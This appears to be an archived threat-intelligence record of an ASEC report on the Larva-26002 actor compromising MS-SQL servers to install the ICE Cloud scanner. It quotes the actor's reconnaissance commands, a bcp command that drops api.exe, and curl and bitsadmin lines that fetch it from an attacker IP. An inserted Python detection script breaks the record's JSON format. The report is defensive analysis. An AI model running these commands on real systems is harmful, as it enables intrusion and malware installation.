{
	"id": "fba8047c-9fa8-4d73-8b55-72f74a37de9c",
	"created_at": "2026-04-10T03:20:04.762764Z",
	"updated_at": "2026-04-10T03:22:17.891097Z",
	"deleted_at": null,
	"sha1_hash": "0716df33748d37a21d5a7053d5ae39d8c1eb73de",
	"title": "Attack Targeting MS‑SQL Servers to Deploy the ICE Cloud Scanner (Larva-26002)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1255972,
	"plain_text": "Attack Targeting MS‑SQL Servers to Deploy the ICE Cloud Scanner (Larva-26002)\r\nBy ATCP\r\nPublished: 2026-03-19 · Archived: 2026-04-10 02:13:04 UTC\r\nAhnLab SEcurity intelligence Center (ASEC) has confirmed that the Larva-26002 threat actor continues to target improperly managed MS-SQL servers in 2026. Larva-26002 distributed the Trigona and Mimic ransomware in the past and has since seized control of infected systems to install scanners. The most recently confirmed attack uses ICE Cloud Client, a scanner malware written in Go.\r\nIn January 2024, Larva-26002 attacked MS-SQL servers to install the Trigona and Mimic ransomware [1]. The email address used in the Mimic ransomware is not known from other attack cases, but the email address used in the Trigona ransomware matched the one covered by Palo Alto [2] and Zscaler [3]. The attack was characterized by abuse of the MS-SQL Bulk Copy Program (BCP) utility to write malware to disk. The threat actor also installed AnyDesk for remote control and a port forwarder for RDP connections. The same threat actor continued its attacks in 2025, adding the Teramind RMM tool and a scanner built in Rust alongside AnyDesk [4].\r\nIn 2026 the attacker again targeted improperly managed MS-SQL servers in the same way as in the previous cases, abused BCP to create malware, and finally installed scanner malware. What distinguishes this campaign is the use of a scanner named ICE Cloud, built in Go, whose strings are written in Turkish; Turkish was also seen in the Mimic ransomware this threat actor used in the past [5].\r\n1. Attacks Against MS-SQL Servers\r\nLarva-26002 attacks MS-SQL servers that are exposed to the internet and configured with simple account credentials, which leaves them vulnerable to brute-force and dictionary attacks. 
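The introduction above notes that this actor's hallmark is abusing BCP to write malware to disk, and that in some environments the scanner is instead fetched with curl or bitsadmin. The following Python is an added example for this page, not code from the ASEC report or from the actor's tooling: it flags process-creation events whose command line has one of those shapes and escalates when the process ancestry leads back to sqlservr.exe. The event schema (image, command line, ancestor chain), the drop directories other than C:\ProgramData, and the sample events are assumptions; the malicious command lines in the samples are the ones the report shows, defanged as on the page.

```python
# Added example for this page; not code from the ASEC report or the actor's tooling.
# Flags process-creation events whose command line matches the BCP-to-file or
# curl/bitsadmin download patterns. The event schema, the drop directories other
# than C:\ProgramData and the sample events are assumptions; command lines in the
# malicious samples are the ones reported by ASEC (defanged as on the page).
import shlex
from dataclasses import dataclass

EXEC_EXT = (".exe", ".dll", ".scr", ".bat", ".cmd", ".ps1")
# C:\ProgramData is the path seen in the report; the other two are assumed
# additions, being world-writable locations attackers commonly use.
DROP_DIRS = ("c:\\programdata\\", "c:\\users\\public\\", "c:\\windows\\temp\\")


@dataclass
class ProcEvent:
    """Minimal process-creation record (assumed schema; map Sysmon EID 1 or 4688 onto it)."""
    image: str             # full path of the new process
    cmdline: str           # its command line
    ancestors: tuple = ()  # parent chain, nearest first (assumed enrichment, may be empty)


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path, with surrounding quotes removed."""
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _tokens(cmdline: str) -> list:
    """Split a Windows command line; posix=False keeps backslashes literal."""
    try:
        toks = shlex.split(cmdline, posix=False)
    except ValueError:  # unbalanced quote: fall back to a naive split
        toks = cmdline.split()
    return [t.strip('"') for t in toks]


def _is_exec_drop(path: str) -> bool:
    """True if path is an executable-like file inside one of the drop directories."""
    p = path.lower()
    return p.startswith(DROP_DIRS) and p.endswith(EXEC_EXT)


def classify(ev: ProcEvent) -> list:
    """Return the names of the rules that match this event (empty list if none)."""
    hits = []
    img = _base(ev.image)
    low = [t.lower() for t in _tokens(ev.cmdline)]

    # bcp.exe ... queryout <file>: query result written straight to an executable path
    if img == "bcp.exe" and "queryout" in low:
        i = low.index("queryout")
        if i + 1 < len(low) and _is_exec_drop(low[i + 1]):
            hits.append("bcp_queryout_exec_drop")

    # curl -o <file> <url>: executable fetched into a drop directory
    if img == "curl.exe" and "-o" in low:
        i = low.index("-o")
        if i + 1 < len(low) and _is_exec_drop(low[i + 1]):
            hits.append("curl_exec_download")

    # bitsadmin /transfer <job> /download ... <url> <file>: the local file is the last argument
    if (img == "bitsadmin.exe" and "/transfer" in low and "/download" in low
            and _is_exec_drop(low[-1])):
        hits.append("bitsadmin_exec_download")

    # Context rule: a hit whose ancestry leads back to the SQL Server service process
    # (for example via xp_cmdshell -> cmd.exe) is far more suspicious than one from a user shell.
    if hits and any(_base(a) == "sqlservr.exe" for a in ev.ancestors):
        hits.append("spawned_from_sqlservr")
    return hits


def scan(events) -> dict:
    """Map event index -> matched rule names, for events that matched at least one rule."""
    out = {}
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            out[i] = hits
    return out


# Constructed sample events (not captured telemetry). Command lines 0-2 are the ones
# the report shows; 3 and 4 are ordinary administrative use that must not alert.
SQL_CHAIN = ("cmd.exe", "sqlservr.exe")
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\bcp.exe",
              r'bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\api.exe" -T -f "C:\ProgramData\FODsOZKgAU.txt"',
              SQL_CHAIN),
    ProcEvent(r"C:\Windows\System32\curl.exe",
              r'curl -o "C:\programdata\api.exe" "hxxp://109.205.211[.]13/api.exe"', SQL_CHAIN),
    ProcEvent(r"C:\Windows\System32\bitsadmin.exe",
              r'bitsadmin /transfer job1 /download /priority high "hxxp://109.205.211[.]13/api.exe" "C:\programdata\api.exe"',
              ("powershell.exe",) + SQL_CHAIN),
    ProcEvent(r"C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\bcp.exe",
              r'bcp "select * from Sales.Orders" queryout "D:\exports\orders.csv" -T -c',
              ("cmd.exe", "explorer.exe")),
    ProcEvent(r"C:\Windows\System32\curl.exe",
              r'curl -o "C:\Users\alice\Downloads\report.pdf" https://example.com/report.pdf',
              ("cmd.exe", "explorer.exe")),
]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].cmdline[:60], "->", rules)
```

The content rules alone will fire on legitimate bulk exports and admin downloads if the drop list is too broad, which is why the file must both sit in a drop directory and carry an executable extension; the ancestry rule is what separates xp_cmdshell-driven activity from an administrator at a console, so feed it a real parent chain rather than only the immediate parent.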
After a successful attack, it uses the following commands to collect information about the infected system.\r\n\u003e hostname\r\n\u003e whoami\r\n\u003e ipconfig\r\n\u003e ipconfig /all\r\n\u003e netstat -an\r\n\u003e tasklist\r\n\u003e tasklist /FI \"IMAGENAME eq sqlservr.exe\" /FO CSV /NH\r\nhttps://asec.ahnlab.com/en/92988/\r\nPage 1 of 6\r\nNext, it uses the BCP utility to create malware. For reference, the BCP utility, bcp.exe, is a command-line tool for bulk importing data into, and exporting data from, MS-SQL server tables. It is typically used to save a large table to a local file or to load a local data file into a table.\r\nThe threat actor stored the malware in the database and then used BCP to write it to a local file. In other words, the threat actor exported the malware from the table \"uGnzBdZbsi\" to a local path with the following command, where \"FODsOZKgAU.txt\" is a format file that describes the column layout. Note that both \"uGnzBdZbsi\" and \"FODsOZKgAU.txt\" are names that have been used consistently since the 2024 attack case.\r\n\u003e bcp \"select binaryTable from uGnzBdZbsi\" queryout \"C:\\ProgramData\\api.exe\" -T -f \"C:\\ProgramData\\FODsOZKgAU.txt\"\r\nFigure 1. Malware creation exploiting the BCP utility\r\nIn certain environments, instead of using BCP, the scanner malware was downloaded with the curl or bitsadmin tools, or with PowerShell.\r\n\u003e curl -o \"C:\\programdata\\api.exe\" \"hxxp://109.205.211[.]13/api.exe\"\r\n\u003e bitsadmin /transfer job1 /download /priority high \"hxxp://109.205.211[.]13/api.exe\" \"C:\\programdata\\api.exe\"\r\nFigure 2. 
Scanner malware download using PowerShell\r\nThe api.exe file created through BCP, curl, or bitsadmin is a downloader, labeled 'ICE Cloud Launcher', that installs a piece of malware named 'ICE Cloud Client'. ICE Cloud Client functions as both a scanner and a brute-force tool and is developed in Go. When the launcher is executed with the \"-show9\" argument, it outputs the following execution log.\r\nFigure 3. ICE Cloud Launcher execution log\r\nICE Cloud Launcher authenticates by sending the following packet to the C\u0026C server and then sends a download request for the scanner, \"ICE Cloud Client\". The downloaded \"ICE Cloud Client\" is written to the same path under a random name that mimics a legitimate program.\r\nFigure 4. Authentication process with C\u0026C server\r\n\"ICE Cloud Client\" is also written in Go and is the component that actually scans MS-SQL servers. The strings in the binary are written in Turkish, and the emoticons used suggest that the author used generative AI. For the RDP protocol there is a simple connection test function, but a scanning command does not appear to be supported yet.\r\nFigure 5. Turkish string and emoji\r\nFigure 6. ICE Cloud Client execution log\r\nAfter authenticating with the C\u0026C server, the scanner proceeds with a registration process, after which the server sends a list of MS-SQL server addresses to attack. Along with the string \"TASK\", it also sends the target protocol, \"mssql\", and the credentials to try, \"ecomm/ecomm\". The scanner attempts to authenticate to MS-SQL at each target address with the supplied ID/PW and reports successful results to the C\u0026C server.\r\nFigure 7. Scanning data received from C\u0026C server\r\n3. 
Conclusion\r\nAttacks against MS-SQL servers typically involve brute-force and dictionary attacks against systems whose account credentials are poorly managed. Administrators should protect database servers from such attacks by using hard-to-guess passwords and changing them regularly.\r\nIt is also important to update V3 to the latest version to prevent malware infection in advance. In addition, database servers exposed to the internet must have their access controlled with security solutions such as firewalls to block external attackers. If these measures are not implemented beforehand, repeated infections by attackers or malware may occur.\r\nMD5\r\n0a9f2e2ff98e9f19428da79680e80b77\r\n28847cb6859b8239f59cbf2b8f194770\r\n5200410ec674184707b731b697154522\r\n7fbbf16256c7c89d952fee47b70ea759\r\n89bf428b2d9214a66e2ea78623e8b5c9\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//109[.]205[.]211[.]13/api[.]exe\r\nFQDN\r\nhostroids[.]com\r\nSource: https://asec.ahnlab.com/en/92988/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://asec.ahnlab.com/en/92988/"
	],
	"report_names": [
		"92988"
	],
	"threat_actors": [],
	"ts_created_at": 1775791204,
	"ts_updated_at": 1775791337,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0716df33748d37a21d5a7053d5ae39d8c1eb73de.pdf",
		"text": "https://archive.orkl.eu/0716df33748d37a21d5a7053d5ae39d8c1eb73de.txt",
		"img": "https://archive.orkl.eu/0716df33748d37a21d5a7053d5ae39d8c1eb73de.jpg"
	}
}